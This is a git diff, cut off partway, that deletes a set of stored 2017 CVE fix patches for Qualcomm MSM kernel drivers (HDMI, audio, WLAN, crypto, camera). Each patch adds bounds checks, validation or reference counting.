-diff --git a/drivers/video/fbdev/msm/mdss_hdmi_tx.c b/drivers/video/fbdev/msm/mdss_hdmi_tx.c
-index 4975aa2..9f897b4 100644
---- a/drivers/video/fbdev/msm/mdss_hdmi_tx.c
-+++ b/drivers/video/fbdev/msm/mdss_hdmi_tx.c
-@@ -632,6 +632,11 @@ static ssize_t hdmi_tx_sysfs_rda_edid(struct device *dev,
- 
- 	mutex_lock(&hdmi_ctrl->tx_lock);
- 	cea_blks = hdmi_ctrl->edid_buf[EDID_BLOCK_SIZE - 2];
-+	if (cea_blks >= MAX_EDID_BLOCKS) {
-+		DEV_ERR("%s: invalid cea blocks\n", __func__);
-+		mutex_unlock(&hdmi_ctrl->tx_lock);
-+		return -EINVAL;
-+	}
- 	size = (cea_blks + 1) * EDID_BLOCK_SIZE;
- 	size = min_t(u32, size, PAGE_SIZE);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11046/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11046/ANY/0001.patch
deleted file mode 100644
index 497d4f6f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11046/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 5ff192e2c758298680b0c6cd364a55c59850901f Mon Sep 17 00:00:00 2001
-From: Vidyakumar Athota <vathota@codeaurora.org>
-Date: Tue, 20 Jun 2017 16:39:00 -0700
-Subject: [PATCH] ASoC: msm: qdsp6v2: add size check to fix out of bounds issue
-
-Before calling audio calibration ioctl functions, compare the
-allocated buffer size to the size of the header and cal type header
-to ensure the buffer is big enough.
-
-Bug: 37623773
-Change-Id: I601bb37ddcc34d459c207cf579f29744fe912d7b
-Signed-off-by: Vidyakumar Athota <vathota@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/audio_calibration.c | 14 +++++++-------
- 1 file changed, 7 insertions(+), 7 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/audio_calibration.c b/sound/soc/msm/qdsp6v2/audio_calibration.c
-index 60d09dfaeb7f7..2a1b34776b686 100644
---- a/sound/soc/msm/qdsp6v2/audio_calibration.c
-+++ b/sound/soc/msm/qdsp6v2/audio_calibration.c
-@@ -453,6 +453,12 @@ static long audio_cal_shared_ioctl(struct file *file, unsigned int cmd,
- 			data->cal_type.cal_hdr.buffer_number);
- 		ret = -EINVAL;
- 		goto done;
-+	} else if ((data->hdr.cal_type_size + sizeof(data->hdr)) > size) {
-+		pr_err("%s: cal type hdr size %zd + cal type size %d is greater than user buffer size %d\n",
-+			__func__, sizeof(data->hdr), data->hdr.cal_type_size,
-+			size);
-+		ret = -EFAULT;
-+		goto done;
- 	}
- 
- 
-@@ -490,13 +496,7 @@ static long audio_cal_shared_ioctl(struct file *file, unsigned int cmd,
- 			goto unlock;
- 		if (data == NULL)
- 			goto unlock;
--		if ((sizeof(data->hdr) + data->hdr.cal_type_size) > size) {
--			pr_err("%s: header size %zd plus cal type size %d are greater than data buffer size %d\n",
--				__func__, sizeof(data->hdr),
--				data->hdr.cal_type_size, size);
--			ret = -EFAULT;
--			goto unlock;
--		} else if (copy_to_user((void *)arg, data,
-+		if (copy_to_user(arg, data,
- 			sizeof(data->hdr) + data->hdr.cal_type_size)) {
- 			pr_err("%s: Could not copy cal type to user\n",
- 				__func__);
diff --git a/Patches/Linux_CVEs/CVE-2017-11048/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11048/ANY/0001.patch
deleted file mode 100644
index df7f27b5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11048/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From a42f6e19316e9e5aaaf8bd2c3bec25fde136dcaa Mon Sep 17 00:00:00 2001
-From: Jayant Shekhar <jshekhar@codeaurora.org>
-Date: Thu, 22 Jun 2017 11:46:47 +0530
-Subject: [PATCH] msm: mdss: Increase fbmem buf ref count before use
-
-The reference count for fbmem buf is not increased before use,
-which means it can be get freed unintentionally when the reference
-count is decreased to "0". In this case, there is possibility of
-use after free. Ensure that fbmem buf refcount is incremented
-before use.
-
-Bug: 37093119
-Change-Id: I525d41e5496a1123e53a438b5f78d4da8bc046bd
-Signed-off-by: Jayant Shekhar <jshekhar@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_mdp_overlay.c | 5 ++++-
- 1 file changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_mdp_overlay.c b/drivers/video/msm/mdss/mdss_mdp_overlay.c
-index 86c6196432e10..4ab89d11d1daa 100644
---- a/drivers/video/msm/mdss/mdss_mdp_overlay.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_overlay.c
-@@ -3917,11 +3917,14 @@ static int mdss_fb_get_metadata(struct msm_fb_data_type *mfd,
- 		break;
- 	case metadata_op_get_ion_fd:
- 		if (mfd->fb_ion_handle) {
-+			get_dma_buf(mfd->fbmem_buf);
- 			metadata->data.fbmem_ionfd =
- 				dma_buf_fd(mfd->fbmem_buf, 0);
--			if (metadata->data.fbmem_ionfd < 0)
-+			if (metadata->data.fbmem_ionfd < 0) {
-+				dma_buf_put(mfd->fbmem_buf);
- 				pr_err("fd allocation failed. fd = %d\n",
- 						metadata->data.fbmem_ionfd);
-+			}
- 		}
- 		break;
- 	case metadata_op_crc:
diff --git a/Patches/Linux_CVEs/CVE-2017-11050/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11050/qcacld-2.0/0001.patch
deleted file mode 100644
index 819a9ff6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11050/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 725674586f5bc009ef5175d29eb0fd677e0ef1f2 Mon Sep 17 00:00:00 2001
-From: "Poddar, Siddarth" <siddpodd@codeaurora.org>
-Date: Mon, 3 Jul 2017 15:57:19 +0530
-Subject: qcacld-2.0: Restrict max/min pktlog buffer size using pktlogconf tool
-
-Restrict the pktlog buffer size to a minimum of 1MB and maximum
-of 16MB using pktlogconf tool or through sysctl command.
-
-CRs-Fixed: 2064785
-Change-Id: I2951de86de083b610bb114ff4b9ddcb51c4c3042
----
- CORE/UTILS/PKTLOG/pktlog_ac.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/UTILS/PKTLOG/pktlog_ac.c b/CORE/UTILS/PKTLOG/pktlog_ac.c
-index 823d2d5..679a78c 100644
---- a/CORE/UTILS/PKTLOG/pktlog_ac.c
-+++ b/CORE/UTILS/PKTLOG/pktlog_ac.c
-@@ -424,14 +424,22 @@ int pktlog_enable(struct ol_softc *scn, int32_t log_state)
- 	return error;
- }
- 
-+#define ONE_MEGABYTE (1024 * 1024)
-+#define MAX_ALLOWED_PKTLOG_SIZE (16 * ONE_MEGABYTE)
- 
- static int
- __pktlog_setsize(struct ol_softc *scn, int32_t size)
- {
- 	struct ol_pktlog_dev_t *pl_dev = scn->pdev_txrx_handle->pl_dev;
- 	struct ath_pktlog_info *pl_info = pl_dev->pl_info;
--	if (size < 0)
-+
-+	if (size < ONE_MEGABYTE || size > MAX_ALLOWED_PKTLOG_SIZE) {
-+		printk("%s: Cannot Set Pktlog Buffer size of %d bytes."
-+			"Min required is %d MB and Max allowed is %d MB.\n",
-+			__func__, size, (ONE_MEGABYTE/ONE_MEGABYTE),
-+			(MAX_ALLOWED_PKTLOG_SIZE/ONE_MEGABYTE));
- 		return -EINVAL;
-+	}
- 
- 	if (size == pl_info->buf_size)
- 		return 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11051/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11051/qcacld-2.0/0001.patch
deleted file mode 100644
index 3c8001fb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11051/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From c8f263f0e3b0b6cba38fae9b2330d77f802c51d8 Mon Sep 17 00:00:00 2001
-From: Ashish Kumar Dhanotiya <adhanoti@codeaurora.org>
-Date: Thu, 6 Jul 2017 16:51:53 +0530
-Subject: qcacld-2.0: Fix Uninitialized memory issue
-
-There is a possibility to read uninitialized memory within api
-__wlan_hdd_cfg80211_testmode.
-
-To resolve this issue, initilaize buffer hb_params with zero.
-
-Change-Id: Ia8061610a8c35aa7290177c0dcd2c5c36d9fcb35
-CRs-Fixed: 2061755
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 20f127b..b19cfd8 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -28402,6 +28402,7 @@ static int __wlan_hdd_cfg80211_testmode(struct wiphy *wiphy,
-                 return -ENOMEM;
-             }
- 
-+            vos_mem_zero(hb_params, sizeof(tSirLPHBReq));
-             vos_mem_copy(hb_params, buf, buf_len);
-             smeStatus = sme_LPHBConfigReq((tHalHandle)(pHddCtx->hHal),
-                                hb_params,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11052/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11052/qcacld-2.0/0001.patch
deleted file mode 100644
index 02939a76..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11052/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From c1ea8487f35d3f4dea574552afda6a1637f98bbb Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Thu, 15 Jun 2017 12:47:46 -0700
-Subject: qcacld-2.0: Properly validate QCA_WLAN_VENDOR_ATTR_NDP_IFACE_STR
-
-Currently the QCA_WLAN_VENDOR_ATTR_NDP_IFACE_STR nla_policy specifies
-a type of NLA_STRING, but the underlying implementation expects a
-NUL-terminated string. Update the policy to correctly use a type of
-NLA_NUL_STRING with the len updated to remove the allocation needed
-for the terminating NUL.
-
-Change-Id: Ic73241511ab73ae63fd7c1a8d6422da91931919c
-CRs-Fixed: 2061688
----
- CORE/HDD/src/wlan_hdd_nan_datapath.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_nan_datapath.c b/CORE/HDD/src/wlan_hdd_nan_datapath.c
-index 2a2e6e4..d29a23a 100644
---- a/CORE/HDD/src/wlan_hdd_nan_datapath.c
-+++ b/CORE/HDD/src/wlan_hdd_nan_datapath.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2016 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2016-2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -40,8 +40,8 @@ static const struct nla_policy
- qca_wlan_vendor_ndp_policy[QCA_WLAN_VENDOR_ATTR_NDP_PARAMS_MAX + 1] = {
- 	[QCA_WLAN_VENDOR_ATTR_NDP_SUBCMD] = { .type = NLA_U32 },
- 	[QCA_WLAN_VENDOR_ATTR_NDP_TRANSACTION_ID] = { .type = NLA_U16 },
--	[QCA_WLAN_VENDOR_ATTR_NDP_IFACE_STR] = { .type = NLA_STRING,
--					.len = IFNAMSIZ },
-+	[QCA_WLAN_VENDOR_ATTR_NDP_IFACE_STR] = { .type = NLA_NUL_STRING,
-+					.len = IFNAMSIZ - 1 },
- 	[QCA_WLAN_VENDOR_ATTR_NDP_SERVICE_INSTANCE_ID] = { .type = NLA_U32 },
- 	[QCA_WLAN_VENDOR_ATTR_NDP_CHANNEL] = { .type = NLA_U32 },
- 	[QCA_WLAN_VENDOR_ATTR_NDP_PEER_DISCOVERY_MAC_ADDR] = {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11053/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11053/qcacld-2.0/0001.patch
deleted file mode 100644
index 58d91137..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11053/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 99c00329bc13c526305dc826950c2cc117e6725d Mon Sep 17 00:00:00 2001
-From: yeshwanth sriram guntuka <ysriramg@codeaurora.org>
-Date: Mon, 3 Jul 2017 11:44:31 +0530
-Subject: qcacld-2.0: Fix kernel memory corruption
-
-Buffer overflow in ConvertQosMapsetFrame function
-when num_dscp_exceptions value is less than 16.
-
-Fix is to return from function if num_dscp_exceptions
-is less than 16.
-
-Change-Id: I2fcce60b7fe5e988348cee786e9a4d493d9512fe
-CRs-Fixed: 2061544
----
- CORE/SYS/legacy/src/utils/src/utilsParser.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/SYS/legacy/src/utils/src/utilsParser.c b/CORE/SYS/legacy/src/utils/src/utilsParser.c
-index 6c99939..e64ce33 100644
---- a/CORE/SYS/legacy/src/utils/src/utilsParser.c
-+++ b/CORE/SYS/legacy/src/utils/src/utilsParser.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2011-2015 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2015, 2017 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -706,6 +706,8 @@ void ConvertQosMapsetFrame(tpAniSirGlobal pMac, tSirQosMapSet* Qos, tDot11fIEQos
-     tANI_U8 i,j=0;
-     if (dot11fIE->num_dscp_exceptions > 58)
-         dot11fIE->num_dscp_exceptions = 58;
-+    if (dot11fIE->num_dscp_exceptions < 16)
-+        return;
-     Qos->num_dscp_exceptions = (dot11fIE->num_dscp_exceptions - 16)/2;
-     for (i = 0; i < Qos->num_dscp_exceptions; i++)
-     {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11054/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11054/qcacld-2.0/0001.patch
deleted file mode 100644
index 772c38c8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11054/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,90 +0,0 @@
-From 4d9812973e8b12700afd8c3d6f36a94506ffb6fc Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Thu, 15 Jun 2017 10:51:02 -0700
-Subject: qcacld-2.0: Avoid overread when configuring MAC addresses
-
-Currently there are multiple cfg80211 vendor commands where MAC
-address attributes are defined in a nla_policy table with a type of
-NLA_UNSPEC but without a minimum length. Add the proper minimum length
-to avoid buffer overread.
-
-Change-Id: I11ff2bd813dc4e6784a7cdee66a0c10ca0e69fcf
-CRs-Fixed: 2061251
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 26 ++++++++++++++++++--------
- 1 file changed, 18 insertions(+), 8 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 1ac1fc1..2ec3d68 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -841,7 +841,9 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_CACHED_SCAN_RESULTS_CONFIG_PARAM_FLUSH] = { .type = NLA_U8 },
- 
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_CACHED_SCAN_RESULTS_CONFIG_PARAM_MAX] = { .type = NLA_U32 },
--    [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_BSSID] = { .type = NLA_UNSPEC },
-+    [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_BSSID] = {
-+        .type = NLA_UNSPEC,
-+        .len = HDD_MAC_ADDR_LEN},
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_RSSI_LOW] = { .type = NLA_S32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_RSSI_HIGH] = { .type = NLA_S32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_CHANNEL] = { .type = NLA_U32 },
-@@ -8080,7 +8082,9 @@ wlan_hdd_cfg80211_get_logger_supp_feature(struct wiphy *wiphy,
- static const struct nla_policy
- wlan_hdd_tdls_config_enable_policy[QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAX +1] =
- {
--    [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAC_ADDR] = {.type = NLA_UNSPEC },
-+    [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAC_ADDR] = {
-+        .type = NLA_UNSPEC,
-+        .len = HDD_MAC_ADDR_LEN},
-     [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_CHANNEL] = {.type = NLA_S32 },
-     [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_GLOBAL_OPERATING_CLASS] =
-                                                        {.type = NLA_S32 },
-@@ -8092,15 +8096,18 @@ wlan_hdd_tdls_config_enable_policy[QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAX +1] =
- static const struct nla_policy
- wlan_hdd_tdls_config_disable_policy[QCA_WLAN_VENDOR_ATTR_TDLS_DISABLE_MAX +1] =
- {
--    [QCA_WLAN_VENDOR_ATTR_TDLS_DISABLE_MAC_ADDR] = {.type = NLA_UNSPEC },
--
-+    [QCA_WLAN_VENDOR_ATTR_TDLS_DISABLE_MAC_ADDR] = {
-+        .type = NLA_UNSPEC,
-+        .len = HDD_MAC_ADDR_LEN},
- };
- 
- static const struct nla_policy
- wlan_hdd_tdls_config_state_change_policy[
-                     QCA_WLAN_VENDOR_ATTR_TDLS_STATE_MAX +1] =
- {
--    [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_MAC_ADDR] = {.type = NLA_UNSPEC },
-+    [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_MAC_ADDR] = {
-+        .type = NLA_UNSPEC,
-+        .len = HDD_MAC_ADDR_LEN},
-     [QCA_WLAN_VENDOR_ATTR_TDLS_NEW_STATE] = {.type = NLA_U32 },
-     [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_REASON] = {.type = NLA_S32 },
-     [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_CHANNEL] = {.type = NLA_U32 },
-@@ -8113,7 +8120,9 @@ static const struct nla_policy
- wlan_hdd_tdls_config_get_status_policy[
-                      QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_MAX +1] =
- {
--    [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_MAC_ADDR] = {.type = NLA_UNSPEC },
-+    [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_MAC_ADDR] = {
-+        .type = NLA_UNSPEC,
-+        .len = HDD_MAC_ADDR_LEN},
-     [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_STATE] = {.type = NLA_U32 },
-     [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_REASON] = {.type = NLA_S32 },
-     [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_CHANNEL] = {.type = NLA_U32 },
-@@ -10761,8 +10770,9 @@ static int __wlan_hdd_cfg80211_wifi_logger_start(struct wiphy *wiphy,
- static const struct
- nla_policy
- qca_wlan_vendor_attr_policy[QCA_WLAN_VENDOR_ATTR_MAX+1] = {
--	[QCA_WLAN_VENDOR_ATTR_MAC_ADDR] =
--		{ .type = NLA_BINARY, .len = VOS_MAC_ADDR_SIZE },
-+	[QCA_WLAN_VENDOR_ATTR_MAC_ADDR] = {
-+		.type = NLA_BINARY,
-+		.len = HDD_MAC_ADDR_LEN},
- };
- 
- /**
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11055/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11055/qcacld-2.0/0001.patch
deleted file mode 100644
index b152eb98..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11055/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 708633ca627031373f5cc3ca2e8994e7d694905a Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Thu, 15 Jun 2017 09:24:17 -0700
-Subject: qcacld-2.0: Apply policy to fine time measurement
-
-Currently QCA_WLAN_VENDOR_ATTR_CONFIG_FINE_TIME_MEASUREMENT is not
-properly represented in the wlan_hdd_wifi_config_policy table, so add
-a proper initializer.
-
-Change-Id: I95ba66337c30cae67b23c9942b9360522ad60df0
-CRs-Fixed: 2061241
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 6624176..1ac1fc1 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -9612,6 +9612,7 @@ wlan_hdd_wifi_config_policy[QCA_WLAN_VENDOR_ATTR_CONFIG_MAX
- 	[QCA_WLAN_VENDOR_ATTR_CONFIG_MODULATED_DTIM] = {.type = NLA_U32 },
- 	[QCA_WLAN_VENDOR_ATTR_CONFIG_STATS_AVG_FACTOR] = {.type = NLA_U16 },
- 	[QCA_WLAN_VENDOR_ATTR_CONFIG_GUARD_TIME] = {.type = NLA_U32 },
-+	[QCA_WLAN_VENDOR_ATTR_CONFIG_FINE_TIME_MEASUREMENT] = {.type = NLA_U32},
- 	[QCA_WLAN_VENDOR_ATTR_CONFIG_TX_RATE] = {.type = NLA_U16 },
- 	[QCA_WLAN_VENDOR_ATTR_CONFIG_CHANNEL_AVOIDANCE_IND] = {.type = NLA_U8 },
- 	[QCA_WLAN_VENDOR_ATTR_CONFIG_TX_MPDU_AGGREGATION] = {.type = NLA_U8 },
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11056/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11056/ANY/0001.patch
deleted file mode 100644
index 306f3fe5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11056/ANY/0001.patch
+++ /dev/null
@@ -1,93 +0,0 @@
-From d5481967f73c5448b9b2ae528a75faa0b040bc42 Mon Sep 17 00:00:00 2001
-From: mohamed sunfeer <msunfeer@codeaurora.org>
-Date: Wed, 21 Jun 2017 15:21:58 +0530
-Subject: [PATCH] compat_qcedev: Fix accessing userspace memory in kernel space
-
-Use put_user API to write the data to userspace from kernel
-space to avoid accessing userspace memory directly in
-kernel space.
-
-Bug: 37893116
-Change-Id: I3f0b0f13e720c052c8c23dfb36ffaccc484369ec
-Signed-off-by: mohamed sunfeer <msunfeer@codeaurora.org>
----
- drivers/crypto/msm/compat_qcedev.c | 10 +---------
- 1 file changed, 1 insertion(+), 9 deletions(-)
-
-diff --git a/drivers/crypto/msm/compat_qcedev.c b/drivers/crypto/msm/compat_qcedev.c
-index 97ae990b5378b..4b36e7343aff6 100644
---- a/drivers/crypto/msm/compat_qcedev.c
-+++ b/drivers/crypto/msm/compat_qcedev.c
-@@ -1,7 +1,7 @@
- /*
-  * QTI CE 32-bit compatibility syscall for 64-bit systems
-  *
-- * Copyright (c) 2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2015, 2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -97,7 +97,6 @@ static int compat_get_qcedev_vbuf_info(
- 
- 	for (i = 0; i < QCEDEV_MAX_BUFFERS; i++) {
- 		err |= get_user(vaddr, &vbuf32->src[i].vaddr);
--		vbuf->src[i].vaddr = NULL;
- 		err |= put_user(vaddr, (compat_uptr_t *)&vbuf->src[i].vaddr);
- 		err |= get_user(len, &vbuf32->src[i].len);
- 		err |= put_user(len, &vbuf->src[i].len);
-@@ -105,7 +104,6 @@ static int compat_get_qcedev_vbuf_info(
- 
- 	for (i = 0; i < QCEDEV_MAX_BUFFERS; i++) {
- 		err |= get_user(vaddr, &vbuf32->dst[i].vaddr);
--		vbuf->dst[i].vaddr = NULL;
- 		err |= put_user(vaddr, (compat_uptr_t *)&vbuf->dst[i].vaddr);
- 		err |= get_user(len, &vbuf32->dst[i].len);
- 		err |= put_user(len, &vbuf->dst[i].len);
-@@ -123,7 +121,6 @@ static int compat_put_qcedev_vbuf_info(
- 
- 	for (i = 0; i < QCEDEV_MAX_BUFFERS; i++) {
- 		err |= get_user(vaddr, (compat_uptr_t *)&vbuf->src[i].vaddr);
--		vbuf32->src[i].vaddr = 0;
- 		err |= put_user(vaddr, &vbuf32->src[i].vaddr);
- 		err |= get_user(len, &vbuf->src[i].len);
- 		err |= put_user(len, &vbuf32->src[i].len);
-@@ -131,7 +128,6 @@ static int compat_put_qcedev_vbuf_info(
- 
- 	for (i = 0; i < QCEDEV_MAX_BUFFERS; i++) {
- 		err |= get_user(vaddr, (compat_uptr_t *)&vbuf->dst[i].vaddr);
--		vbuf32->dst[i].vaddr = 0;
- 		err |= put_user(vaddr, &vbuf32->dst[i].vaddr);
- 		err |= get_user(len, &vbuf->dst[i].len);
- 		err |= put_user(len, &vbuf32->dst[i].len);
-@@ -276,7 +272,6 @@ static int compat_get_qcedev_sha_op_req(
- 
- 	for (i = 0; i < QCEDEV_MAX_BUFFERS; i++) {
- 		err |= get_user(vaddr, &data32->data[i].vaddr);
--		data->data[i].vaddr = 0;
- 		err |= put_user(vaddr, (compat_uptr_t *)&data->data[i].vaddr);
- 		err |= get_user(len, &data32->data[i].len);
- 		err |= put_user(len, &data->data[i].len);
-@@ -295,7 +290,6 @@ static int compat_get_qcedev_sha_op_req(
- 	err |= get_user(diglen, &data32->diglen);
- 	err |= put_user(diglen, &data->diglen);
- 	err |= get_user(authkey, &data32->authkey);
--	data->authkey = NULL;
- 	err |= put_user(authkey, (compat_uptr_t *)&data->authkey);
- 	err |= get_user(authklen, &data32->authklen);
- 	err |= put_user(authklen, &data->authklen);
-@@ -322,7 +316,6 @@ static int compat_put_qcedev_sha_op_req(
- 
- 	for (i = 0; i < QCEDEV_MAX_BUFFERS; i++) {
- 		err |= get_user(vaddr, (compat_uptr_t *)&data->data[i].vaddr);
--		data32->data[i].vaddr = 0;
- 		err |= put_user(vaddr, &data32->data[i].vaddr);
- 		err |= get_user(len, &data->data[i].len);
- 		err |= put_user(len, &data32->data[i].len);
-@@ -341,7 +334,6 @@ static int compat_put_qcedev_sha_op_req(
- 	err |= get_user(diglen, &data->diglen);
- 	err |= put_user(diglen, &data32->diglen);
- 	err |= get_user(authkey, (compat_uptr_t *)&data->authkey);
--	data32->authkey = 0;
- 	err |= put_user(authkey, &data32->authkey);
- 	err |= get_user(authklen, &data->authklen);
- 	err |= put_user(authklen, &data32->authklen);
diff --git a/Patches/Linux_CVEs/CVE-2017-11057/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11057/ANY/0001.patch
deleted file mode 100644
index 8d6e9bd5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11057/ANY/0001.patch
+++ /dev/null
@@ -1,84 +0,0 @@
-From 270bb9351889878dbfc87a6797886cb3caf42430 Mon Sep 17 00:00:00 2001
-From: kaiwang <kaiwang@codeaurora.org>
-Date: Tue, 27 Jun 2017 19:29:03 +0800
-Subject: [PATCH] msm: camera: sensor:validating the flash initialization
- parameters
-
-Copying the flash initialization parameters from userspace memory to
-kernel memory and in turn checking for the validity of the flash
-initialization parameters pointer sent from userspace
-
-CRs-Fixed: 2059812
-Bug: 37949660
-Change-Id: I957c10959108eb08b263d439a9a449b90338b6db
-Signed-off-by: kaiwang <kaiwang@codeaurora.org>
----
- .../msm/camera_v2/sensor/flash/msm_flash.c         | 38 +++++++++++++++++-----
- 1 file changed, 30 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-index 4a13ef87898d7..0390e0e60deab 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-@@ -498,22 +498,44 @@ static int32_t msm_flash_init(
- 	return 0;
- }
- 
--#ifdef CONFIG_COMPAT
- static int32_t msm_flash_init_prepare(
- 	struct msm_flash_ctrl_t *flash_ctrl,
- 	struct msm_flash_cfg_data_t *flash_data)
- {
-+#ifdef CONFIG_COMPAT
-+	struct msm_flash_cfg_data_t flash_data_k;
-+	struct msm_flash_init_info_t flash_init_info;
-+	int32_t i = 0;
-+	if(!is_compat_task()) {
-+		/*for 64-bit usecase,it need copy the data to local memory*/
-+		flash_data_k.cfg_type = flash_data->cfg_type;
-+		for (i = 0; i < MAX_LED_TRIGGERS; i++) {
-+			flash_data_k.flash_current[i] =
-+				flash_data->flash_current[i];
-+			flash_data_k.flash_duration[i] =
-+				flash_data->flash_duration[i];
-+		}
-+
-+		flash_data_k.cfg.flash_init_info = &flash_init_info;
-+		if (copy_from_user(&flash_init_info,
-+			(void *)(flash_data->cfg.flash_init_info),
-+			sizeof(struct msm_flash_init_info_t))) {
-+			pr_err("%s copy_from_user failed %d\n",
-+				__func__, __LINE__);
-+			return -EFAULT;
-+		}
-+		return msm_flash_init(flash_ctrl, &flash_data_k);
-+	}
-+	/*
